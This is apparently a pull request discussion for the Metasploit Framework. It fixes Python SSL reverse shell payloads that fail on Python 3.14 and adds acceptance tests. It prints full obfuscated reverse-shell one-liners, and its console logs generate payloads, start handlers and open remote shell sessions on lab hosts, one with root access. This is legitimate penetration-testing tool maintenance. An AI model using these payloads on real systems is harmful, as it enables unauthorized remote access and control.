### PR TITLE
Fix Python SSL Command Shell Payloads

### LINKED ISSUE #21301: cmd/unix/reverse_python_ssl Fails on Python 3.14
## Steps to reproduce

Test the `cmd/unix/reverse_python_ssl` payload with Python 3.14, see it fail

```
echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNptj81qwzAQhM/WU+hmiaoiNmlxCjqE4kAobUMTn41qbYipahmtnLx+Zez+Ul3EfrMzzLbvvfOBomveIAgcXnvvGkAUDgWiJejUpMnpY/O03tTbp/Ig5nH/fP9Q7w8v5fqRR49sXNdBExhLs1Uus9tCZjcrmeVFKpbx8bikYry8eN3XX8mRVmqjLQK5nFoLtHOxWnVHEqODVig9NGeWLfIlJ0l7pBY6NipcqUVcSrCiih78ACQZz1Df58id6+dlaaBxBlg6hON1kXKBJ7BWjTaBwbgh/PJtd+WIwfv/cNv9pbHZlFKftR1AjZqcSKyvDeP0in7CmDrD6JIInWE/zZx8AGzAi/E\=\'\)\[0\]\)\)\) | $(which python || which python3 || which python2) -
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 4, in <module>
AttributeError: module 'ssl' has no attribute 'wrap_socket'
```

## Expected behavior

It should work. It should also continue to work with all of the same versions it used to.

## Current behavior

Right now it crashes, see the stack trace above.

### Metasploit version

Latest from git.

## Additional Information
It's imperative that the solution continues to work on all of the same version of python that it used to. An acceptable solution will not drop Python 2.7 support. The current module does work with Python 3.4, so the change where `ssl.wrap_socket` was dropped happend somewhere between 3.4 and 3.14. These types of command payloads aren't typically constrained by size, so increasing it to handle the extra Python versions isn't a major concern.

It's possible that other Python payloads are also affected by this issue where `ssl.wrap_socket` is invoked and will cause an exception. It would be helpful to investigate the other Python payloads to look for this and fix it as necessary.

Spotted while testing #21255.

### PR DESCRIPTION
**Pull request by zeroSteiner**
Fixes SSL command shell payloads for Python by consolidating the SSL wrapping logic. It also adds tests to the command shell acceptance tests to catch regressions in the future. The tests cover Python 2.6 (where SSL was introduced) 2.7, 3.4 and 3.13 which together mark the boundaries of some edge cases the code works through. Fixes #21301 and supersedes the PRs that previously attempted to close that issue.

## Verification

List the steps needed to make sure this thing works

- [ ] Tests should pass
- [ ] Do a spot check with one of the new SSL payloads, see it work

### CODE REVIEW

File: spec/support/acceptance/command_shell/python_ssl.rb [hunk 1]
```diff
@@ -0,0 +1,75 @@
...
+    {
+      payloads: [
+        {
+          name: 'python/shell_reverse_tcp_ssl',
+          extension: '.py',
+          platforms: [:linux],
+          execute_cmd: [
+            'bash', '-c',
+            "#{runtime} run --rm --network host -v \${payload_path}:\${payload_path}:Z -e PYENV_VERSION=#{pyenv_version} #{image} python \${payload_path}"
+          ],
```
[the remark this answers is not in the document]
Comment (zeroSteiner) [reply spec/support/acceptance/command_shell/python_ssl.rb:43]: >and the Python SSL acceptance runs will fail.

The tests are [passing](https://github.com/rapid7/metasploit-framework/actions/runs/26185828021/job/77040941767?pr=21484), so this is a false positive. Dismissing.

**Review by bwatters-r7 — APPROVED** [review]

**Comment by bwatters-r7** [comment]
I'm not going to have a chance to go back and see if it is a regression, but the python unix shell does not accept the `exit` command?

Tomorrow I'll double check that is the same behavior as before.

```
msf payload(cmd/windows/python/shell_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf payload(cmd/windows/python/shell_reverse_tcp) > set lport 4863
lport => 4863
msf payload(cmd/windows/python/shell_reverse_tcp) > generate -f raw -o winpy.py
[*] Writing 428 bytes to winpy.py...
msf payload(cmd/windows/python/shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
msf payload(cmd/windows/python/shell_reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4863 
[*] Command shell session 2 opened (10.5.135.201:4863 -> 10.5.132.126:52152) at 2026-05-26 20:25:06 -0500

msf payload(cmd/windows/python/shell_reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  2         shell cmd/windows               10.5.135.201:4863 -> 10.5.132.126:52152 (10.5.132.126)

msf payload(cmd/windows/python/shell_reverse_tcp) > 

```

```
msf > use payload/cmd/unix/reverse_python_ssl 
msf payload(cmd/unix/reverse_python_ssl) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf payload(cmd/unix/reverse_python_ssl) > set lport 4585
lport => 4585
msf payload(cmd/unix/reverse_python_ssl) > generate -f raw -o payload.py
[+] echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNp1kVFrwyAQx5/rp8hblDlpuhVKIQ8jZFDWNaXJ2xhizXUNtTGo6bZvP0OyriubL3q/+9/9T62OjTYusFoewFHbbhujJVhLtUVWxz1n/YaH6OGRL1ZpQYcwz5Innheb9OGZ+BomdV2DdBiH0ZhNWXQ3ZZNxFNL76WxKCKoGR6uQM59zG/sTezei4WcXguBDQuN8Eitx3JYikHNswQnnDJY0lHuQB77X1tXiCCF9FMoCoReKE5hq98mPuvTpziFJNwVfZauUUHltR15uo1eCO1meLxNdO/hw+G3o5jEN15usyJJsyYtlzpPlIl0VIf1X0VueiW96mtwRv9D7vlIQFKaFORqVwonYMgPyhKPx5J6gUbULFNS4y5A4HnvRaGtAHNCo+5j454PYWjeDkJUg/T1x2Lrd7Sz077AHpeLOhFpX6tb9qlus0w6DMX/hqr6mfqq+Cz8J1ULc5VhP/OiixCS4Cb6h7zpAX8Us1KVQCl/WE/QFasTU0Q\=\=\'\)\[0\]\)\)\) | $(which python || which python3 || which python2) -
[*] Writing 709 bytes to payload.py...
msf payload(cmd/unix/reverse_python_ssl) > to_handler
[+] echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNp1kVFrwyAQx5/rp8hblDlpuhVKIQ8jZFDWNaXJ2xhizXUNtTGo6bZvP0OyriubL3q/+9/9T62OjTYusFoewFHbbhujJVhLtUVWxz1n/YaH6OGRL1ZpQYcwz5Innheb9OGZ+BomdV2DdBiH0ZhNWXQ3ZZNxFNL76WxKCKoGR6uQM59zG/sTezei4WcXguBDQuN8Eitx3JYikHNswQnnDJY0lHuQB77X1tXiCCF9FMoCoReKE5hq98mPuvTpziFJNwVfZauUUHltR15uo1eCO1meLxNdO/hw+G3o5jEN15usyJJsyYtlzpPlIl0VIf1X0VueiW96mtwRv9D7vlIQFKaFORqVwonYMgPyhKPx5J6gUbULFNS4y5A4HnvRaGtAHNCo+5j454PYWjeDkJUg/T1x2Lrd7Sz077AHpeLOhFpX6tb9qlus0w6DMX/hqr6mfqq+Cz8J1ULc5VhP/OiixCS4Cb6h7zpAX8Us1KVQCl/WE/QFasTU0Q\=\=\'\)\[0\]\)\)\) | $(which python || which python3 || which python2) -
[*] Payload Handler Started as Job 0
msf payload(cmd/unix/reverse_python_ssl) > 
[*] Started reverse SSL handler on 10.5.135.201:4585 
[*] Command shell session 1 opened (10.5.135.201:4585 -> 10.5.132.240:41718) at 2026-05-26 20:17:21 -0500

msf payload(cmd/unix/reverse_python_ssl) > sessions -i -1
[*] Starting interaction with 1...

exit




ls
KscvKUUo
ip.txt
linux-image-5.15.0-gpu117_5.15.0-gpu117-1_riscv64.deb
payload.py
exit
id
uid=0(root) gid=0(root) groups=0(root)
[*] 10.5.132.240 - Command shell session 1 closed.
```

**Comment by bwatters-r7** [comment]
The issue with `exit` is not a regression.

**Comment by bwatters-r7** [comment]
#Release Notes:
Fixes python ssl command shell payloads that failed with `AttributeError: module 'ssl' has no attribute 'wrap_socket'`
